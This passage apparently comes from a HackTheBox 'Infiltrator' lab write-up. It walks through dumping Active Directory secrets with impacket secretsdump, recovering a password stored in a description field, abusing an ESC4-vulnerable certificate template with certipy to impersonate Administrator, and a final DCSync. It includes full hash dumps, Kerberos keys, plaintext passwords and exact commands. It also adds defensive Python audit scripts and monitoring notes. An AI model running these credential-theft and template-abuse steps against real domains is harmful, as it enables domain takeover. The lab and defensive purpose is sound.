$MACHINE.ACC:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cdc9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882715927e45
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688
dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909
[*] NL$KM
 0000   2E 8A EC D8 ED 12 C6 ED  26 8E B0 9B DF DA 42 B7   ........&.....B.
 0010   49 DA B0 07 05 EE EA 07  05 02 04 0E AD F7 13 C2   I...............
 0020   6C 6D 8E 19 1A B0 51 41  7C 7D 73 9E 99 BA CD B1   lm....QA|}s.....
 0030   B7 7A 3E 0F 59 50 1C AD  8F 14 62 84 3F AC A9 92   .z>.YP....b.?...
NL$KM:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab051417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d27644ab3070f72ec264fcb413d75299
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5:::
infiltrator.htb\winrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a58456b73e30f:::
infiltrator.htb\lan_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f429d897c92931:::
infiltrator.htb\M.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7:::
inf​iltrator.htb\D.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\L.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\O.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4:::
infiltrator.htb\A.walker:1110:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576e574b:::
infiltrator.htb\K.turner:1111:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2604531:::
infiltrator.htb\E.rodriguez:1112:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51b6e2e965a:::
[*] Kerberos keys from Active Directory/ntds.dit
DC$:aes256-cts-hmac-sha1-96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176
DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0f
DC$:des-cbc-md5:5eea34b3317aea91
krbtgt:aes256-cts-hmac-sha1-96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87
krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540
krbtgt:des-cbc-md5:10bfc49ecd3b58d9
infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4
infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606a
infiltrator.htb\winrm_svc:des-cbc-md5:7aba231386c2ecf8
infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96
infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9
infiltrator.htb\lan_managment:des-cbc-md5:31c83197ab944052
infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49
infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0
infiltrator.htb\M.harris:des-cbc-md5:3ee3688376f2e5ce
infiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f
infiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69
infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345
infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc
infiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983
infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefd
infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f
infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120
infiltrator.htb\O.martinez:des-cbc-md5:f80bc202755d2cfd
infiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a
infiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4
infiltrator.htb\A.walker:des-cbc-md5:a7e6cde06d6e153b
infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8
infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109b
infiltrator.htb\K.turner:des-cbc-md5:4607b9eaec6838ba
infiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5
infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0c
infiltrator.htb\E.rodriguez:des-cbc-md5:9d5bdaf2cd26165d
[*] Cleaning up...
Unfortunately those hashes no longer work, which is to be expected from an old backup. Luckily ntds.dit contains more than just hashes[4]. ntdsdotsqlite can be used to extract that information and export it as an SQLite3 database.
ntdsdotsqlite Active\ Directory/ntds.dit --system registry/SYSTEM -o ntds.sqlite

sqlite3 ntds.sqlite
SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .tables
containers            groups                trusted_domains
domain_dns            machine_accounts      user_accounts
domains               organizational_units
sqlite> SELECT samaccountname,description FROM user_accounts;
Administrator|Built-in account for administering the computer/domain
Guest|Built-in account for guest access to the computer/domain
krbtgt|Key Distribution Center Service Account
winrm_svc|User Security and Management Specialist
lan_managment|l@n_M@an!1331
M.harris|Head of Development Department
D.anderson|
L.clark|
O.martinez|
A.walker|
K.turner|
E.rodriguez|
As already seen with another account, the description for lan_managment contains a string that might be a password. Testing those credentials with nxc confirms l@n_M@an!1331 to be the password for that account.
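Both findings in this section, the shared NT hash of D.anderson and L.clark in the secretsdump output and the password sitting in the description field of lan_managment, are things an administrator can audit in the same two exports without cracking anything. The Python below is an added example (not from the write-up and not impacket's or ntdsdotsqlite's code) that parses the two output formats shown above and applies those checks. The sample rows are copied from the output on this page; the empty-password hash constant is the well-known NT hash of the empty string.

```python
"""Password-reuse and description-field audit over secretsdump and
ntdsdotsqlite output (added example; sample rows copied from above)."""
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# secretsdump 'domain\user:rid:lmhash:nthash:::' lines, copied from the output above.
SAMPLE_SECRETSDUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
infiltrator.htb\M.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7:::
infiltrator.htb\D.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\L.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\O.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4:::
[*] Kerberos keys from Active Directory/ntds.dit
"""

# sqlite 'samaccountname|description' rows, copied from the query above.
SAMPLE_DESCRIPTIONS = """\
Administrator|Built-in account for administering the computer/domain
krbtgt|Key Distribution Center Service Account
winrm_svc|User Security and Management Specialist
lan_managment|l@n_M@an!1331
M.harris|Head of Development Department
D.anderson|
"""

SECRETSDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")
# a whitespace-delimited token of 8+ chars containing a digit and a symbol
PASSWORD_LIKE = re.compile(r"(?<!\S)(?=\S{8,})(?=\S*\d)(?=\S*[!@#$%^&*?_\-])\S+")


def parse_secretsdump(text):
    """Keep only the credential lines; status lines such as '[*] ...' are skipped."""
    rows = []
    for line in text.splitlines():
        match = SECRETSDUMP_LINE.match(line.strip())
        if match:
            rows.append(match.groupdict())
    return rows


def shared_nt_hashes(rows):
    """nthash -> accounts that share it. Equal NT hashes mean equal passwords,
    which is the password reuse noticed earlier with the STATUS_ACCOUNT_RESTRICTION
    logon attempts. The empty-password hash is reported separately."""
    by_hash = defaultdict(list)
    for row in rows:
        if row["nt"] != EMPTY_NT:
            by_hash[row["nt"]].append(row["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def empty_password_accounts(rows):
    return [row["user"] for row in rows if row["nt"] == EMPTY_NT]


def parse_sqlite_rows(text):
    """'name|description' lines -> list of (name, description)."""
    return [tuple(line.split("|", 1)) for line in text.splitlines() if "|" in line]


def suspicious_descriptions(name_desc_pairs):
    """Descriptions containing a token that looks like a password."""
    return [(name, desc) for name, desc in name_desc_pairs if PASSWORD_LIKE.search(desc)]


if __name__ == "__main__":
    rows = parse_secretsdump(SAMPLE_SECRETSDUMP)
    print("shared hashes:", shared_nt_hashes(rows))
    print("empty passwords:", empty_password_accounts(rows))
    print("password-like descriptions:",
          suspicious_descriptions(parse_sqlite_rows(SAMPLE_DESCRIPTIONS)))
```

The description check is worth running directly against LDAP in a live domain too, because the description attribute is readable by every authenticated user by default; the nxc step earlier in this write-up is exactly that read from the other side.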
Shell as Administrator
Checking for potential edges in BloodHound shows that this user can read the password of the group managed service account infiltrator_svc$. Next I retrieve its NTLM hash with nxc and get 407546ca61cd7d3870e7dc6b0b007ecd.
Then I check for vulnerable certificate templates with certipy-ad, which finds a template called Infiltrator_Template that's vulnerable to ESC4.
certipy-ad find -vulnerable \
    -u 'infiltrator_svc$@infiltrator.htb' \
    -hashes :407546ca61cd7d3870e7dc6b0b007ecd \
    -target dc01.infiltrator.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'infiltrator-DC01-CA'
[*] Saved BloodHound data to '20241023181945_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241023181945_Certipy.txt'
[*] Saved JSON output to '20241023181945_Certipy.json'

cat 20241023181945_Certipy.txt
Certificate Authorities
  0
    CA Name                             : infiltrator-DC01-CA
    DNS Name                            : dc01.infiltrator.htb
    Certificate Subject                 : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
    Certificate Serial Number           : 724BCC4E21EA6681495514E0FD8A5149
    Certificate Validity Start          : 2023-12-08 01:42:38+00:00
    Certificate Validity End            : 2124-08-04 18:55:57+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INFILTRATOR.HTB\Administrators
      Access Rights
        ManageCertificates              : INFILTRATOR.HTB\Administrators
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
        ManageCa                        : INFILTRATOR.HTB\Administrators
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
        Enroll                          : INFILTRATOR.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Infiltrator_Template
    Display Name                        : Infiltrator_Template
    Certificate Authorities             : infiltrator-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          PendAllRequests
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Smart Card Logon
                                          Server Authentication
                                          KDC Authentication
                                          Client Authentication
    Requires Manager Approval           : True
    Requires Key Archival               : False
    Authorized Signatures Required      : 1
    Validity Period                     : 99 years
    Renewal Period                      : 650430 hours
    Minimum RSA Key Length              : 2048
    Permissions
      Object Control Permissions
        Owner                           : INFILTRATOR.HTB\Local System
        Full Control Principals         : INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Owner Principals          : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Dacl Principals           : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Property Principals       : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
    [!] Vulnerabilities
      ESC4                              : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissions
With infiltrator_svc$ I can modify the vulnerable template, so I'll make it vulnerable to ESC1 and then request a new certificate, supplying administrator@infiltrator.htb as the Subject Alternative Name.
certipy-ad template -u 'infiltrator_svc$@infiltrator.htb' \
    -hashes :407546ca61cd7d3870e7dc6b0b007ecd \
    -target dc01.infiltrator.htb \
    -template Infiltrator_Template \
    -save-old
[*] Saved old configuration for 'Infiltrator_Template' to 'Infiltrator_Template.json'
[*] Updating certificate template 'Infiltrator_Template'
[*] Successfully updated 'Infiltrator_Template'

certipy-ad req -u 'infiltrator_svc$@infiltrator.htb' \
    -hashes :407546ca61cd7d3870e7dc6b0b007ecd \
    -target dc01.infiltrator.htb \
    -ca infiltrator-DC01-CA \
    -template Infiltrator_Template \
    -upn administrator@infiltrator.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'administrator@infiltrator.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

certipy-ad auth -u 'administrator' \
    -domain infiltrator.htb \
    -dc-ip 10.129.156.109 \
    -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@infiltrator.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@infiltrator.htb': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1
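Why ESC4 is as serious as ESC1: the certipy output shows Infiltrator_Template is not directly abusable (manager approval required, one authorised signature required), yet a single non-admin principal with Write Dacl / Write Owner / Write Property on the template object can remove those gates. The Python below is an added example (not certipy's code and not the write-up's) that evaluates a template for both conditions and shows the remediation. INFILTRATOR_TEMPLATE is transcribed from the certipy text output above; its enrollment_rights entry is an assumption, since that section is not shown on this page. ESC1_READY is constructed as the minimum edit that satisfies the ESC1 checks below, not a transcript of what the certipy template command writes.

```python
"""Template audit for ESC4 (object-control rights) and ESC1 (unchecked
subject supply) conditions (added example; one transcribed template,
one constructed 'after' state)."""

PRIVILEGED = {"Administrators", "Domain Admins", "Enterprise Admins", "Local System"}

_ADMINS = ["INFILTRATOR.HTB\\Domain Admins", "INFILTRATOR.HTB\\Enterprise Admins",
           "INFILTRATOR.HTB\\Local System"]

# Transcribed from the certipy output above (enrollment_rights is an assumption).
INFILTRATOR_TEMPLATE = {
    "name": "Infiltrator_Template",
    "enabled": True,
    "client_authentication": True,        # EKU list includes Client Authentication
    "enrollee_supplies_subject": True,    # Certificate Name Flag: EnrolleeSuppliesSubject
    "requires_manager_approval": True,
    "authorized_signatures_required": 1,
    "enrollment_rights": ["INFILTRATOR.HTB\\Authenticated Users"],   # ASSUMED, not in the output
    "owner": "INFILTRATOR.HTB\\Local System",
    "write_owner": ["INFILTRATOR.HTB\\infiltrator_svc"] + _ADMINS,
    "write_dacl": ["INFILTRATOR.HTB\\infiltrator_svc"] + _ADMINS,
    "write_property": ["INFILTRATOR.HTB\\infiltrator_svc"] + _ADMINS,
}

# Constructed: the two gates removed, which is all ESC1 needs on this template.
ESC1_READY = dict(INFILTRATOR_TEMPLATE, requires_manager_approval=False,
                  authorized_signatures_required=0)


def short(principal):
    """'INFILTRATOR.HTB\\Domain Admins' -> 'Domain Admins'."""
    return principal.split("\\", 1)[-1]


def esc4_principals(template):
    """Non-privileged principals that can rewrite the template: owner, WriteOwner,
    WriteDacl or WriteProperty. Each can turn the template into an ESC1 one."""
    found = set()
    for right in ("owner", "write_owner", "write_dacl", "write_property"):
        value = template.get(right, [])
        for principal in ([value] if isinstance(value, str) else value):
            if short(principal) not in PRIVILEGED:
                found.add(principal)
    return sorted(found)


def is_esc1(template):
    """All ESC1 conditions together: enabled, client-auth EKU, requester supplies
    the subject, no approval gate, no signature gate, low-privileged enroller."""
    low_priv_enroll = any(short(p) not in PRIVILEGED for p in template["enrollment_rights"])
    return (template["enabled"] and template["client_authentication"]
            and template["enrollee_supplies_subject"]
            and not template["requires_manager_approval"]
            and template["authorized_signatures_required"] == 0
            and low_priv_enroll)


def audit(template):
    return {"ESC4": esc4_principals(template), "ESC1": is_esc1(template)}


def remediated(template):
    """Strip non-admin object-control rights and keep the manager-approval gate,
    so a requester-supplied subject is never issued unchecked."""
    fixed = dict(template, requires_manager_approval=True)
    for right in ("write_owner", "write_dacl", "write_property"):
        fixed[right] = [p for p in template[right] if short(p) in PRIVILEGED]
    return fixed


if __name__ == "__main__":
    print("as found:   ", audit(INFILTRATOR_TEMPLATE))
    print("after ESC4: ", audit(ESC1_READY))
    print("remediated: ", audit(remediated(ESC1_READY)))
```

Two monitoring notes follow from the checks: a change to a pKICertificateTemplate object shows up as Security event 5136 on the domain controller hosting the Configuration partition if that container carries a SACL, and a certificate issued with a UPN that does not match the requester (Request ID 10 above) is visible in the CA's issued-certificates log, which is where the write-up's `administrator.pfx` would be found after the fact.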
Authenticating with the newly issued certificate gets me a TGT for Administrator through PKINIT, and certipy's `auth` also recovers the account's NT hash from that ticket. With the hash I can log in interactively to read the final flag, and I can run secretsdump against the DC to pull every account's secrets out of NTDS.dit over DRSUAPI.
```
impacket-secretsdump -hashes :1356f502d2764368302ff0369b1121a1 \
  INFILTRATOR.HTB/Administrator@dc01.infiltrator.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xb69149edc42a85733e4efe5e35a33e87
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4dc8e10f3a29237b05bdfdb5bded5451:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
INFILTRATOR\DC01$:aes256-cts-hmac-sha1-96:15db1652b02a83f4324bd8ba4f2a20eb8ea7631bf87dfec2d4f97ebeff32435d
INFILTRATOR\DC01$:aes128-cts-hmac-sha1-96:70d8ad0059f5e81f43310c34e9937556
INFILTRATOR\DC01$:des-cbc-md5:80fe9dbfa22531ab
INFILTRATOR\DC01$:plain_password_hex:0a3183391dac772712b98e94fead3b9456bfedcc57c953d18084f50e94cf42d6c08434a1d3217c2fe151916a0ae7867c415ab8d3546f4ecc4707410ca56e2556aef2298066f7842ec1ad4819706032c10db5d22ff762c9a4fdeb82405627c04ed0ae8ee0514170acb1f0fa8964a2d045ba16b749ef89933bccd53b25a8aa0f5d17c2d519f9aa7a939b1fb9701bb88a1abb5efdfbcd02226e09032d8ffced8801e6cf8adf16bceb1491482d23a8281326cc82a6fa06425336d1422cd3b1cadd389263a9f557ce5221a86b28a71dc6276a0ac8165b7c5c5929dd3998130bbd7b9e41b9a8e4d69e1b7a614f25b6a8aa672b
INFILTRATOR\DC01$:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f:::
[*] DefaultPassword
INFILTRATOR\Administrator:Infiltrator_Box1337!
[*] DPAPI_SYSTEM
dpapi_machinekey:0xbd8a15f7e24918ac40db6b340498aeda032c4fc0
dpapi_userkey:0xf0f81997f3c057103ab87ac71dc986c455880e83
[*] NL$KM
 0000   A9 F8 C1 38 F1 FB 53 1A  E1 12 CA 8A 61 D3 C1 D6   ...8..S.....a...
 0010   67 09 77 BC BC C6 BC 2F  5D E3 18 3D 66 DB 6D 9F   g.w..../]..=f.m.
 0020   03 30 80 2D 25 9F 69 56  39 55 EA A3 50 D0 CA 0F   .0.-%.iV9U..P...
 0030   C6 18 45 14 9E 8E B6 3C  46 49 6F 3B FA EF FE 89   ..E....<FIo;....
NL$KM:a9f8c138f1fb531ae112ca8a61d3c1d6670977bcbcc6bc2f5de3183d66db6d9f0330802d259f69563955eaa350d0ca0fc61845149e8eb63c46496f3bfaeffe89
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d400d2ccb162e93b66e8025118a55104:::
infiltrator.htb\D.anderson:1103:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\L.clark:1104:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\M.harris:1105:aad3b435b51404eeaad3b435b51404ee:3ed8cf1bd9504320b50b2191e8fb7069:::
infiltrator.htb\O.martinez:1106:aad3b435b51404eeaad3b435b51404ee:daf40bbfbf00619b01402e5f3acd40a9:::
infiltrator.htb\A.walker:1107:aad3b435b51404eeaad3b435b51404ee:f349468bb2c669ec8c3fd4154fdfe126:::
infiltrator.htb\K.turner:1108:aad3b435b51404eeaad3b435b51404ee:a119c0d5af383e9591ebb67857e2b658:::
infiltrator.htb\E.rodriguez:1109:aad3b435b51404eeaad3b435b51404ee:b02e97f2fdb5c3d36f77375383449e56:::
infiltrator.htb\winrm_svc:1601:aad3b435b51404eeaad3b435b51404ee:120c6c7a0acb0cd808e4b601a4f41fd4:::
infiltrator.htb\lan_managment:8101:aad3b435b51404eeaad3b435b51404ee:a1983d156e1d0fdf9b01208e2b46670d:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f:::
infiltrator_svc$:3102:aad3b435b51404eeaad3b435b51404ee:407546ca61cd7d3870e7dc6b0b007ecd:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d9ae321762ce3d90ff7835a9e9a8fe453bcc3b35c0cb212326e0efb2e8b29ba
Administrator:aes128-cts-hmac-sha1-96:762b10a1e2296a49bab7da1ce32755ed
Administrator:des-cbc-md5:0497041f3e5d2598
krbtgt:aes256-cts-hmac-sha1-96:673c00e9dd5ca94e9be6312a159fc1c4e2ef95792ec45f867ec2c1ad439f3150
krbtgt:aes128-cts-hmac-sha1-96:674de1e736dbefda6f24dd914e598d79
krbtgt:des-cbc-md5:a4b9c73bc4a46bcd
infiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f
infiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69
infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345
infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc
infiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983
infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefd
infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:90dd4ed523ecc25972afe0b133cad79d5c5b88e6bc5cd1a8d2920ccb45b15596
infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:bf1e51ae7fa659e146833d8de8ff3d17
infiltrator.htb\M.harris:des-cbc-md5:7fabf8e6e5678a67
infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:d497f5a48df0dd55d34c79c7893867a3aad8b222dc7f41af67a1476735c9ed75
infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:a062fd39eee45a7ceea3f8e5b7525d10
infiltrator.htb\O.martinez:des-cbc-md5:70f8164a9713ba8c
infiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:cbaeaefb06f17d3eb1d49550e5714fbdf517922c841375cd6a6cd750aa5e3efe
infiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:27b89dea58e7a98cfadc60b2af7ab568
infiltrator.htb\A.walker:des-cbc-md5:a4515dd5d09be9b9
infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:0f75078e57f71485606fef572b36a278645e2053438e8596c48be7e41e56055a
infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:fb14214da9c033aa04c0d559abbd3f7a
infiltrator.htb\K.turner:des-cbc-md5:b94a5d234307459b
infiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:52c2444473f775e05ba01744af63901249a018ade7369a262981ce3aeede220a
infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:9988b989a3d40045326f8908094a79be
infiltrator.htb\E.rodriguez:des-cbc-md5:2f013eea29c7f237
infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:61f308b54f3b17ed48c2877c775a6aa37789b46c1741e356f6fcdab75373d1ca
infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:1d454266ab84bfe7ce7bb03e48a23ac7
infiltrator.htb\winrm_svc:des-cbc-md5:01ce70109ecea73b
infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:e66b410341a87c4f1ff382e9c4e3e26d0a351de2ebea9ba0d234b7713cfb0ce6
infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:5bf2b52baf80470a2dfe5466c44e9896
infiltrator.htb\lan_managment:des-cbc-md5:b6044c94896e57f1
DC01$:aes256-cts-hmac-sha1-96:15db1652b02a83f4324bd8ba4f2a20eb8ea7631bf87dfec2d4f97ebeff32435d
DC01$:aes128-cts-hmac-sha1-96:70d8ad0059f5e81f43310c34e9937556
DC01$:des-cbc-md5:fb2954402cd32f5e
infiltrator_svc$:aes256-cts-hmac-sha1-96:dde8b959997f0901f1f637ef42744eca4ab16e2ece74cbbd78b7d75a508d9fd5
infiltrator_svc$:aes128-cts-hmac-sha1-96:9ba9a006372fba0d97c3c0ce8610d21d
infiltrator_svc$:des-cbc-md5:c44a5129ece6fd8f
[*] Cleaning up...
```
Attack Path
```mermaid
flowchart TD
    subgraph "Initial access"
    A(Webpage) -->|Scrape for Users| B(List of potential names)
    B -->|username-anarchy| C(Permutations of usernames)
    C -->|User Enumeration via Kerberos| D(Valid usernames)
    D -->|ASREPRoasting| E(Hash for l.clark)
    E -->|Crack Hash| F(Access as l.clark)
    F -->|List users and description| Z(Credentials for k.turner)
    end
    subgraph "Execution"
